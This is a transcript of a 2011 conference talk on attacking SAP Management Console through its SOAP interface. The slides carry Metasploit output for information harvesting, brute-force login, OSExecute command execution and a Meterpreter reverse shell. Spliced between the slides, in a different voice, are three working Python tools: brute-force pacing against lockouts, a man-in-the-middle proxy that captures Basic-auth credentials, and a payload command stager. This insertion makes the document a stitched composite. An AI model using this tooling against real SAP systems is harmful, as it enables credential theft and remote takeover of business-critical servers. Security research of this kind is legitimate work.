SAP (in)security: Scrubbing SAP clean with SOAP

Chris John Riley
Hashdays Conference (29th Oct. 2011)

Abstract:

At the heart of any large enterprise lies a platform misunderstood and feared by all but the bravest systems administrators. Home to a wealth of information, and key to infinite wisdom. This platform is SAP. For years this system has been amongst the many "red pen" items on penetration tests and audits alike... but no more! We will no longer accept the cries of "Business critical, out-of-scope". The time for SAP has come, the cross-hairs of attackers are firmly focused on the soft underbelly that is ERP, and it's our duty to follow suit. Join me as we take the first steps into exploring SAP, extracting information and popping shells. Leave your Nessus license at the door! It's time to scrub this SAP system clean with SOAP!

Speaker notes:
  • Yeah… I said that! SAP is a perfect goal for attackers. All the company's crown jewels in one place!
  • In 2010 SAP released more than 900 fixes… SAP is a complex product, and complex products always have flaws. Research into coding flaws shows 15-50 bugs per 1000 lines of delivered code… not all are security related, but that's still a lot of bugs!
  • It's not ALL SAP's fault… complex configurations, user error, maintaining backwards compatibility, take your pick. In offering so much SAP are their own worst enemy.
  • If security never see it, how can they secure it? More importantly, if they don't understand it, how can they ever hope to secure it!
  • Think about THAT logic for a second! I'm pretty sure every security professional has heard that at one point or another.
  • So what's this SOAP thing then?
  • Not a cleaning product! We'll be using it to scrub SAP clean however. I'm sure lots of you have heard of Web Services. Simply XML over HTTP or HTTPS. Flexible (can run over SMTP...). SO HOW DOES SOAP FIT INTO OUR SAP TOPIC?
  • Yes it's a sad sad world! SAP MC uses a range of unauthenticated requests, but some of the more fun functions require username/password authentication.
  • Lots of cool data. Lots of cool functions. Lots of fun to be had!
  • There's pages of this stuff… much too much for a slide… and much too much to make this stuff available for attackers!
  • dbms_type: The database interface recognizes the type of the database system by the environment variable dbms_type. Possible values: ora, inf, db2, db4, db6, ada, mss. OLDER VERSIONS of SAP can include environment variables such as MSSQL_USER.
  • Effect of password policies on keyspace reduction (Openwall). Different password compliance rules can reduce the overall keyspace considerably!
  • So I scanned a small country!
  • What do we have already: full server environment, version info, SAP SID, database info, valid SAP usernames, trace and debug logs.
  • Wait... SSL will save us!
  • Yep.. It's a feature, remember? But we've already covered how we could get that.
  • OSExecute is all well and good... Run a single command. Get the response..
  • Block it. Filter it. Restrict it to administrators. YES this means internally as well!

    1. SAP (in)security: Scrubbing SAP clean with SOAP. Chris John Riley
    2. "THE WISEST MAN, IS HE WHO KNOWS, THAT HE KNOWS NOTHING" SOCRATES: APOLOGY, 21D
    3. NOT AN EXPERT!
    4. 1) What's what 2) Information is king 3) Getting in the middle 4) Putting it all together 5) Stopping Bob!
    5. WHAT'S WHAT
    6. "…the world's leading provider of business software, SAP (which stands for "Systems, Applications, and Products in Data Processing") delivers products and services that help accelerate business innovation for our customers."
    7. Other people describe them as… "…the world's leading repository of business critical information, SAP (which stands for "Security Ain't [our] Problem") delivers products and services that help attackers gain access to critical enterprise data."
    8. [Photo: Some rights reserved by TrevinC]
    9. IS IT REALLY THAT BAD?
    10-11. [Photo: Some rights reserved by Telstar Logistics]
    12. So Many Reasons
       - Vulnerabilities are a part of it! Every system has its vulnerabilities
       - SAP installations often fall to the business: "Not an operations problem", "Financial data should be handled by the business"
       - Security team never gets close to it!
    13. "YOU CAN'T TEST THAT, IT'S BUSINESS CRITICAL!" UNKNOWN PROJECT MANAGER
    14. [Photo: Some rights reserved by Telstar Logistics]
    15. SIMPLE OBJECT ACCESS PROTOCOL
    16. You're getting SOAP all over my SAP! [Diagram: THIS TALK; SAP Security; Netweaver; SOAP]
    17. A LITTLE BIT ABOUT SAP MANAGEMENT CONSOLE
    18. SAP MC Communications
       - Default port 5<instance>13/14: 50013 HTTP, 50014 HTTPS
       - Can use SSL, if it's configured. More on this later!
    19. SAP MC Communications
       - Uses Basic auth for some functions. Yes... It's 2011. Yes... Companies still use Basic Auth
       - Most functions don't even use that!
    20. ENABLED BY DEFAULT…
    21. ON ALL SAP SYSTEMS!
    22. SAP MC MMC Snap-in [screenshot]
    23. SAP MC JAVA Applet [screenshot]
    24. INFORMATION IS KING
    25. "If there's one thing SAP MC loves, it's giving away information" Quote by: Me, just now!
    26. Show me the money!
    27. Information is king: Version information
       - Sure, HTTP headers give that! Nothing new here... mostly
       - Down to the patch-level. Can you say "targeted attack"
    28-29. Version Information
       msf auxiliary(sap_mgmt_con_version) > show options

       Module options (auxiliary/scanner/sap/sap_mgmt_con_version):
          Name     Current Setting  Required  Description
          ----     ---------------  --------  -----------
          Proxies                   no        Use a proxy chain
          RHOSTS   172.16.15.128    yes       The target address range
          RPORT    50013            yes       The target port
          THREADS  1                yes       The number of threads
          URI      /                no        Path to the SAP MC
          VHOST                     no        HTTP server virtual host
    30-31. Version Information
       msf auxiliary(sap_mgmt_con_version) > run
       [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
       [+] [SAP] Version Number Extracted - 172.16.15.128:50013
       [+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel
       [+] [SAP] SID: NSP
       [*] Scanned 1 of 1 hosts (100% complete)
       [*] Auxiliary module execution completed
    32. Information is king: Startup profile
       - Instance name, SAP System Name, SAP SID, SAP DB Schema, Paths, ....
    33-34. Startup Profile
       msf auxiliary(sap_mgmt_con_startprofile) > run
       [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
       [+] [SAP] Startup Profile Extracted: \\WINXPSAP-TST\sapmnt\NSP\SYS\profile\START_DVEBMGS00_WINXPSAP-TST
       [*] SAPSYSTEMNAME = NSP
       [*] SAPGLOBALHOST = WINXPSAP-TST
       [*] SAPSYSTEM = 00
       [*] INSTANCE_NAME = DVEBMGS00
       [*] DIR_PROFILE = \\WINXPSAP-TST\sapmnt\NSP\SYS\profile
       [*] _PF = $(DIR_PROFILE)\NSP_DVEBMGS00_WINXPSAP-TST
       [*] dbs/ada/schema = SAPNSP
    35. Information is king: Server / Instance Environment
       - Computername, Database Names, Database Type (Oracle, MaxDB, ...)
       - Full Server Environment Variable list! Information overload. OMG why!
    36-37. Environment
       msf auxiliary(sap_mgmt_con_getenv) > run
       [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
       [*] COMPUTERNAME=WINXPSAP-TST
       [*] ComSpec=C:\WINDOWS\system32\cmd.exe
       [*] DBMS_TYPE=ada
       [*] FP_NO_HOST_CHECK=NO
       [*] OS=Windows_NT
       [*] USERNAME=SAPServiceNSP
       [*] PSModulePath=C:\windows\system32\PowerShell...
       [*] SAPEXE=E:\usr\sap\NSP\SYS\exe\uc\NTI386
       [*] TMP=E:\usr\sap\NSP\tmp
    38. Information is king: SAP Log/Tracefiles
       - SAP Startup Logs, Error / Debug Logs, Developer Traces, Security Logs
       - SAP ABAP SysLog: SAP Startup Times, PIDs, Services + Status Info
    39. Log/Trace Files
       msf auxiliary(sap_mgmt_con_listlogfiles) > run
       [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
       Filename         Size  Timestamp
       --------         ----  ---------
       available.log    2268  2011 10 16 12:52:33
       dev_cp           4397  2011 04 19 10:30:48
       dev_disp         4612  2011 10 14 15:06:14
       dev_icm          6594  2011 10 14 15:07:38
       sapstart.log      629  2011 10 14 15:06:04
       sapstartsrv.log   754  2011 10 16 10:04:36
       stderr1           903  2011 10 14 15:06:04
    40. Log/Trace Files (raw SOAP response)
       <SAPControl:ReadDeveloperTraceResponse>
         <name>E:\usr\sap\NSP\DVEBMGS00\work\dev_w0</name>
         <item>trc file: "dev_w0", trc level: 1, release: "720"</item>
         <item>---------------------------------------------------</item>
         <item>* ACTIVE TRACE LEVEL 1</item>
         <item>M pid 3564</item>
         <item>M DpSysAdmExtCreate: ABAP is active</item>
         <item>M DpShMCreate: allocated sys_adm at 09A40048</item>
         <item>M DpShMCreate: allocated wp_adm at 09A43020</item>
         <item>M DpShMCreate: allocated tm_adm at 09A47E48</item>
         …
    41. ABAP Log File (raw SOAP response)
       <SAPControl:ABAPReadSyslogResponse>
         <log>
           <item>
             <Time>2011 10 14 15:06:18</Time>
             <Text>SAP: ICM started on host WINXPSAP-TST (PID: 3536)</Text>
             <Severity>SAPControl-GREEN</Severity>
           </item>
           <item>
             <Time>2011 10 14 15:06:12</Time>
             <Text>SAP Basis: Active ICU Version 3.4; Compiled With ICU 3.4; Unicode Version 4.1</Text>
             <Severity>SAPControl-GREEN</Severity>
           </item>
           …
    42. Information is king: Extracting data from logfiles
       - Logfiles include usernames. Scrape for usernames. Instant brute-force user list! #winning!
       - Just an example of the data available
    43-44. Extract Users
       [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
       [+] [SAP] Users Extracted: 10 entries extracted
       [+] [SAP] Extracted User: SAPSYS
       [+] [SAP] Extracted User: TEST1
       [+] [SAP] Extracted User: TESTDEV
       [+] [SAP] Extracted User: ADMIN1
       [+] [SAP] Extracted User: SAPADM
       [+] [SAP] Extracted User: TEST2
       …
    45. Information is king: Process Parameters
       - Output of the entire SAP configuration
       - Password Policies: set up your brute-force just right ;)
       - Hash Types: still supporting those old 8 char hashes?
       - Security Audit Log enabled? rsau/enabled (default: 0). Is anybody watching?
    46-47. Process Parameters
       msf auxiliary(sap_mgmt_con_getprocessparameter) > run
       [*] [SAP] Connecting to SAP MC on 172.16.15.128:50013
       [*] [SAP] Attempting to matche (?i-mx:^login/password)
       [SAP] Process Parameters
       Name                                    Value
       ----                                    -----
       login/password_charset                  1
       login/password_downwards_compatibility  1
       login/password_hash_algorithm           encoding=RFC2307, algorithm=iSSHA-1, saltsize=96
       login/password_max_idle_productive      0
    48-49. Process Parameters (raw SOAP response)
       <SAPControl:GetProcessParameterResponse>
         <parameter>
           <item>
             <name>DIR_AUDIT</name>
             <group>System</group>
             <description>Directory for security audit files</description>
             <unit/>
             <value>E:\usr\sap\NSP\DVEBMGS00\log</value>
           </item>
           <item>
             <name>login/fails_to_user_lock</name>
             <group>Login</group>
             <description>Number of invalid login attempts until user lock</description>
             <unit/>
             <value>5 </value>
           </item>
           …
    50. Information is king: Useful Process Parameters
       - rsau/enabled
       - login/password_downwards_compatibility
       - login/failed_user_auto_unlock
       - login/fails_to_user_lock
       - login/min_password_lng
       - login/password_charset
       - ....
       *Check out consolut.com for a great list
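The slides above (45 to 50) describe reading the whole profile out of the unauthenticated GetProcessParameter call and turning the login/* values into brute-force settings. The helper below is an added example, not code from the talk or from the Metasploit modules it shows: it renders the SAPControl SOAP envelope that sapstartsrv expects (namespace urn:SAPControl; send it by HTTP POST to http://host:5NN13/ with Content-Type text/xml and an empty SOAPAction header), parses a GetProcessParameterResponse, and reports the lockout budget and weak settings. The parameter names and order for OSExecute and the default values used for missing keys are assumptions; check them against the instance's own WSDL (GET /?wsdl on the same port). SAMPLE_RESPONSE is constructed from the values on the slides with made-up description text, and nothing here touches a network.

```python
"""SAPControl (SAP Management Console / sapstartsrv) SOAP helper: build a
method call, parse GetProcessParameterResponse, audit the login policy."""
from xml.sax.saxutils import escape
import xml.etree.ElementTree as ET

SOAP_ENV_NS = "http://schemas.xmlsoap.org/soap/envelope/"
SAPCONTROL_NS = "urn:SAPControl"


def build_request(method, params=None):
    """Return the SOAP body for one SAPControl method call.

    params: ordered mapping child-element -> text, e.g. for OSExecute
    {"command": ..., "async": "0", "timeout": "1", "protocolfile": ""}
    (element names as assumed from the SAPControl WSDL). Text is
    XML-escaped so a command containing & or < cannot break the envelope."""
    children = "".join(
        f"<{name}>{escape(str(text))}</{name}>"
        for name, text in (params or {}).items()
    )
    return (
        '<?xml version="1.0" encoding="utf-8"?>'
        f'<SOAP-ENV:Envelope xmlns:SOAP-ENV="{SOAP_ENV_NS}"'
        f' xmlns:SAPControl="{SAPCONTROL_NS}">'
        "<SOAP-ENV:Header/><SOAP-ENV:Body>"
        f"<SAPControl:{method}>{children}</SAPControl:{method}>"
        "</SOAP-ENV:Body></SOAP-ENV:Envelope>"
    )


def _local(tag):
    """'{urn:SAPControl}item' -> 'item'; sapstartsrv mixes prefixed and bare tags."""
    return tag.rsplit("}", 1)[-1]


def parse_process_parameters(xml_text):
    """Map parameter name -> value (whitespace stripped); every <item> that
    carries a <name> child counts, whatever namespace it sits in."""
    params = {}
    for elem in ET.fromstring(xml_text).iter():
        if _local(elem.tag) != "item":
            continue
        fields = {_local(c.tag): (c.text or "").strip() for c in elem}
        if "name" in fields:
            params[fields["name"]] = fields.get("value", "")
    return params


def audit_login_policy(params):
    """Findings for the settings the slides single out. Fallback values for
    missing keys are assumptions, not SAP's documented defaults."""
    findings = []
    if params.get("rsau/enabled", "0") == "0":
        findings.append("rsau/enabled=0: Security Audit Log off, failed logons leave no audit trail")
    if params.get("login/password_downwards_compatibility", "0") != "0":
        findings.append("login/password_downwards_compatibility!=0: legacy 8-character "
                        "upper-case hash still stored beside the salted one; crack the weak one")
    min_len = int(params.get("login/min_password_lng") or 6)
    if min_len < 8:
        findings.append(f"login/min_password_lng={min_len}: short minimum length shrinks the keyspace")
    return findings


def brute_force_budget(params):
    """How many guesses per user before the lock (the DoS the slides warn of).

    login/fails_to_user_lock is the attempt that locks, so the safe budget is
    one less. login/failed_user_auto_unlock=1 means the lock lifts by itself
    (next day), so a slow run can resume; 0 means an admin has to unlock."""
    lock_after = int(params.get("login/fails_to_user_lock") or 5)
    auto_unlock = params.get("login/failed_user_auto_unlock", "1") == "1"
    return {"safe_attempts_per_user": max(lock_after - 1, 0),
            "lock_clears_automatically": auto_unlock}


# Constructed response: values from the slides, descriptions invented.
SAMPLE_RESPONSE = r"""<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
 xmlns:SAPControl="urn:SAPControl"><SOAP-ENV:Body>
<SAPControl:GetProcessParameterResponse><parameter>
<item><name>DIR_AUDIT</name><group>System</group><description>Directory for security audit files</description><unit/><value>E:\usr\sap\NSP\DVEBMGS00\log</value></item>
<item><name>rsau/enabled</name><group>System</group><description>Security audit log</description><unit/><value>0</value></item>
<item><name>login/fails_to_user_lock</name><group>Login</group><description>Number of invalid login attempts until user lock</description><unit/><value>5 </value></item>
<item><name>login/failed_user_auto_unlock</name><group>Login</group><description>Automatic unlock</description><unit/><value>1</value></item>
<item><name>login/password_downwards_compatibility</name><group>Login</group><description>Legacy hash</description><unit/><value>1</value></item>
<item><name>login/min_password_lng</name><group>Login</group><description>Minimum length</description><unit/><value>6</value></item>
</parameter></SAPControl:GetProcessParameterResponse>
</SOAP-ENV:Body></SOAP-ENV:Envelope>"""

if __name__ == "__main__":
    found = parse_process_parameters(SAMPLE_RESPONSE)
    print(brute_force_budget(found))
    for line in audit_login_policy(found):
        print(line)
```

With the slide values the budget comes out as four guesses per user with automatic unlock, which is exactly the pacing a brute-force module needs to avoid locking the SAP service accounts.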
    51. "I put a whitebox configuration audit in your blackbox penetration test, so you can whitebox SAP while you blackbox it!" Quote by: Me, just now!
    52. Information overload. All unauthenticated. But you have to be IN the network right! Right?
    53-55. Bueller... Bueller... Bueller
    56. [Chart: number of SAP servers listening on public addresses, y-axis 2,500 to 2,700, one bar each for Router, Gateway, SAP MC and SAP MC (SSL)]
    57. [Photo: Some rights reserved by Crystl]
    58. GETTING IN THE MIDDLE
    59. Basic auth is your friend!
    60. SAP MC authentication [screenshot]
    61. MAN IN THE MIDDLE…
    62. LET ME COUNT THE WAYS…
    63. Getting in the middle
       - Force Authentication: Basic Auth == Clear Text. Credentials FTW!
       - Alter Requests: do what YOU want
       - Alter Responses
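Slide 63's "force authentication" trick relies on two properties the earlier slides establish: the SAP MC clients speak plain HTTP on 5NN13 by default, and the functions that do need credentials use Basic auth, so the password crosses the wire base64-encoded and nothing more. The model below is an added example, not code from the talk or from the author's MITM module: a proxy in the path answers the client's first unauthenticated SOAP POST with a 401 challenge of its own, and decodes the Authorization header out of the retry. The realm string, the header samples and the simulated client are constructed; over HTTPS this only works once the certificate has been impersonated as slides 66 and 67 describe.

```python
"""Force-authentication capture for Basic-auth SAP MC traffic (model)."""
import base64
import binascii

REALM = "SAP Management Console"   # assumed realm text; any realm triggers the client prompt


def challenge():
    """The 401 the proxy injects so the client resends with credentials."""
    return (b"HTTP/1.1 401 Unauthorized\r\n"
            b'WWW-Authenticate: Basic realm="' + REALM.encode() + b'"\r\n'
            b"Content-Length: 0\r\n\r\n")


def decode_basic(header_value):
    """(user, password) from an Authorization value, or None when it is not
    a well-formed Basic credential (other scheme, bad base64, no colon)."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token.strip(), validate=True)
    except (binascii.Error, ValueError):
        return None
    user, sep, password = raw.decode("latin-1").partition(":")
    return (user, password) if sep else None


def encode_basic(user, password):
    """What the client puts on the wire: colon-joined pair, base64, no secrecy."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def intercept(headers):
    """One proxy decision for a client request (headers: name -> value).
    Returns ("challenge", bytes) to inject, or ("captured", (user, pw))."""
    lowered = {k.lower(): v for k, v in headers.items()}
    creds = decode_basic(lowered["authorization"]) if "authorization" in lowered else None
    if creds is None:
        return "challenge", challenge()
    return "captured", creds


def simulate_client(user, password):
    """Drive the two-step exchange the way a Basic-auth client behaves: an
    unauthenticated SOAP POST, the injected 401, then the same POST with
    credentials. The request headers are constructed samples."""
    first = {"Host": "sap.example:50013", "Content-Type": "text/xml", "SOAPAction": '""'}
    action, reply = intercept(first)
    assert action == "challenge" and reply.startswith(b"HTTP/1.1 401")
    retry = dict(first, Authorization=encode_basic(user, password))
    return intercept(retry)


# Constructed capture: the header a client sends for sapservicensp / Pr0d@dm1n
CAPTURED_HEADER = "Basic c2Fwc2VydmljZW5zcDpQcjBkQGRtMW4="

if __name__ == "__main__":
    print(decode_basic(CAPTURED_HEADER))
    print(simulate_client("sapservicensp", "Pr0d@dm1n"))
```

The point of the malformed-header branches is practical: a client that sends a Digest or NTLM header, or a broken retry, must not crash the proxy mid-stream, otherwise the victim notices a dropped console before any credential is captured.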
    64-65. SAP MC authentication [screenshots]
    66. Getting in the middle: 4 different options for SSL protection
       - Self Signed
       - Device Default (not an option for SAP)
       - Enterprise CA: you sign your own certs centrally
       - Externally signed: Diginotar to the rescue! SAP also offer signing services
    67. Getting in the middle: Impersonate SSL
       - There's a module for that ;)
       - Creates a fake cert, as close to the original as possible
       - Useful SE options: expired yesterday; add CN names for ease of use
    68. PUTTING IT ALL TOGETHER
    69. OSExecute: SAP MC generously offers an OSExecute function. Valid username/password required. That's handy!
    70. USERNAME / PASSWORD?
    71. MITM using the force-auth method. Check under the keyboard. Post-it notes! Rubber hose method
    72. Brute-Force Metasploit module
       - Set SAP SID for SAP specific checks
       - Watch out for lockouts! Denial of Service?
    73. Brute Force
       msf auxiliary(sap_mgmt_con_brute_login) > set SAP_SID NSP
       msf auxiliary(sap_mgmt_con_brute_login) > run
       [*] SAPSID set to NSP - Setting default SAP wordlist
       [*] Trying username:sapservicensp password:
       [-] [01/18] - failed to login as sapservicensp password:
       [*] Trying username:sapservicensp password:sapserviceNSP
       [-] [02/18] - failed to login as sapadm password:
       [*] Trying username:nspadm password:
       …
    74. OSExecute
       auxiliary(sap_..._osexec) > set RHOSTS 172.16.15.128
       auxiliary(sap_..._osexec) > set USERNAME sapservicensp
       auxiliary(sap_..._osexec) > set PASSWORD Pr0d@dm1n
       auxiliary(sap_..._osexec) > set CMD hostname
       auxiliary(sap_..._osexec) > run
       [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
       [+] [SAP] Command run as PID: 1240
       Command output
       --------------
       WINXPSAP-TST
    75. THANKS, BUT WE WANT METERPRETER!
    76. Getting Meterpreter: using tricks built into Metasploit
       - Encode payload
       - Split it up into chunks
       - Shove it in
       - Start it up!
       - Profit
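OSExecute runs one command per SOAP call, so the "encode, split, shove in, start" steps on slide 76 are what any command stager does: the stage is base64-encoded, cut into pieces that fit one command line, appended to a file on the host one call at a time, then decoded and launched. The block below is an added example of that arithmetic with a local round-trip check; it is not the talk's code and not Metasploit's own stager (which has several flavours; the slides do not say which one the module used). The decode step with certutil -decode, the drop path and the payload bytes are choices and stand-ins of this example, and nothing is executed on any host.

```python
"""Command-stager chunking for a one-command-per-call execution primitive."""
import base64

DEST = r"%TEMP%\stage.b64"          # assumed drop path on the target (cmd.exe syntax)
PAYLOAD = bytes(range(256)) * 40    # constructed 10 KiB stand-in for a real stage


def stage_commands(payload, dest=DEST, max_cmd_len=1000):
    """Return the ordered cmd.exe one-liners that rebuild and start payload.

    max_cmd_len bounds each command: cmd.exe stops at 8191 characters and the
    transport may be tighter, so it is a parameter. Base64 uses only
    [A-Za-z0-9+/=], none of which cmd.exe treats specially, so no quoting
    is needed inside the echo."""
    text = base64.b64encode(payload).decode("ascii")
    template = "echo {}>>" + dest
    room = max_cmd_len - len(template.format(""))
    if room < 4:
        raise ValueError("max_cmd_len leaves no room for data")
    cmds = ["del /q " + dest]                       # start from a clean file
    cmds += [template.format(text[i:i + room]) for i in range(0, len(text), room)]
    exe = dest.rsplit(".", 1)[0] + ".exe"
    cmds.append(f"certutil -decode {dest} {exe}")   # decode choice of this example
    cmds.append(f"start /b {exe}")
    return cmds


def reassemble(cmds):
    """Replay the echo lines locally and return the decoded bytes: the check
    to run before spending hundreds of OSExecute calls on a live target."""
    buf = "".join(c[len("echo "):c.index(">>")] for c in cmds if c.startswith("echo "))
    return base64.b64decode(buf, validate=True)


if __name__ == "__main__":
    cmds = stage_commands(PAYLOAD)
    print(len(cmds), "commands; longest", max(len(c) for c in cmds), "chars")
    print("round trip ok:", reassemble(cmds) == PAYLOAD)
```

For the 101,079-byte stage in the slide 77 output the same arithmetic gives well over a hundred SOAP calls at a 1,000-character limit, which is why the Metasploit stager prints a progress counter and why the run leaves a long, regular trail in the sapstartsrv log if anyone reads it.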
    77. OSExecute Meterpreter
       msf exploit(sap_mgmt_con_osexec_exploit) > exploit
       [*] Started reverse handler on 172.16.15.134:4444
       [*] Command Stager - 7.42% done (7499/101079 bytes)
       ...
       [*] Command Stager - 100.00% done (101079/101079 bytes)
       [*] Meterpreter session 1 opened (172.16.15.134:4444 -> 172.16.15.128:1144) at 2011-10-16 14:41:59 +0200
       meterpreter > getuid
       Server username: WINXPSAP-TST\SAPServiceNSP
    78. STOPPING BOB!
    79. WHY IS YOUR SAP MC ACCESSIBLE TO THE WORLD!
    80. SLIGHTLY LESS HTTPS == BAD
    81. Fixing the issues
       - SAP Fix: SAP Note 1439348. Issue also discovered by Onapsis
       - No idea what it says! SAP restrict ALL fix info to customers only
    82. Next Steps: More Research
       - Finish the MITM module: Force Auth works now, JAVA Applet deployment not so much
       - Look at SAP SSL implementation: SSL is a punching bag right now
       - Sleep
    83. Questions? http://c22.cc contact@c22.cc
    84. Big Thanks: The REAL SAP Security Researchers (Onapsis, DSecRG, Raul Siles, CYBSEC), SAP PSRT, DirtySec (You know who you are!), MacLemon for the PPT-fu, all the people who helped make this happen
    85. Thanks for coming http://c22.cc contact@c22.cc
    86. Sorry for sucking so bad! http://c22.cc contact@c22.cc